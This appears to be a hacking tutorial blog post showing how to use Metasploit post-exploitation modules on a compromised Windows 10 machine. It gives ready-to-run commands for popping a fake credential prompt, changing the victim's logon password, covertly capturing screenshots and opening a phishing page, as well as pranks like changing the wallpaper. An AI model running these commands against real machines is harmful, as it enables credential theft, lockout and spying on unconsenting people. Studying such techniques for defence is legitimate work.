In this article you will learn, after compromised the victim machine what we can do by using post exploitation. There are 478 post exploitation modules which are available in metasploit framework but in this article we will use only five modules which is working on window 10 machine.
What is Post-Exploitation Module ?
Once the victim machine has to be compromised by the attacker & then with the help of post module you can gather information or evidence about the victim. The post module also can be used to maintain the access to the system.
Lets Begin !!
We already have compromised the victim machine with administrator privileges. You can see here.
Window Credential Phishing
This post module is used to perform the phishing attack on the target machine by popping up a login prompt. When the victim fills credentials in the login prompt, the credentials will go to to the attacker.
For perform this attack you need to have to execute the following commands.
1 2 3 | use post/windows/gather/phish_windows_credentials set session 1 run |
After that the login prompt will show on the victim machine just like below given image.
When victim will enter his credentials in the login prompt you can observe the credentials will be successfully comes to the attacker.
Multi Manage Play Youtube Video
With the help of this exploit you can broadcast a Youtube video on compromised system. Each Youtube video has a special VID with the help of which the youtube video broadcast on victim machine.
We have to go on youtube and select the VID of any video form which you want to broadcast on victim system.
Go back on kali linux and carry out his work by using following command.
1 2 3 4 5 | use exploit/multi/handler use post/multi/manage/play_youtube set session 4 set vid n1VWeLcTmmA run |
After execute the attack, you can see that the broadcasting will be done on victim machine with full screen mode.
Multi Manage Set Wallpaper
This module will give you the permission to change the desktop wallpaper of the victim machine.
Before go Ahead, we must have PNG or JPEG format image. After that we need to execute these commands as given below.
1 2 3 4 | use post/multi/manage/set_wallpaper set session 4 set wallpaper_file /home/shubham/Desktop/1.png run |
As soon as we execute this module, victim’s desktop wallpaper will successfully be changed.
Change Password
This Module will help us to change the window logon password of the target machine.
Execute these given command on multi/handler to perform the attack.
Note : To perform this attack we must have admin privileges.
1 2 3 4 5 6 | use windows/manage/change_password set session 4 set old_password 123456789 set new_password 12345678 set smbuser hp run |
After executing the attack, victim cannot login with his old password.
Windows Gather Screen Spy
In this module attackers can take the desktop screenshot of the victim machine anonymously. This allow for screen spying that can be useful for attackers to track or record the screen of victim.
You need to enter these given commands on multi/handler.
1 2 3 4 | use post/windows/gather/screen_spy set session 10 set view_screenshots true run |
After executing the module, we will get screenshot of vicitm machine with delay of five second.
Open a URL ( Phishing )
This module allows an attacker to open any file or URL on the target machine. Most of the time attacker take help of this module to perform the phishing attack.
To create a phishing page you can use the AdvPhishing tool.
After that we have to go back on kali linux terminal and execute these given commands on multi/handler.
1 2 3 4 | use post/multi/manage/open set session 10 set uri https://50b0b3a3.ngrok.io run |
You can see that the phishing page has opened on victim machine.
Done !!
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
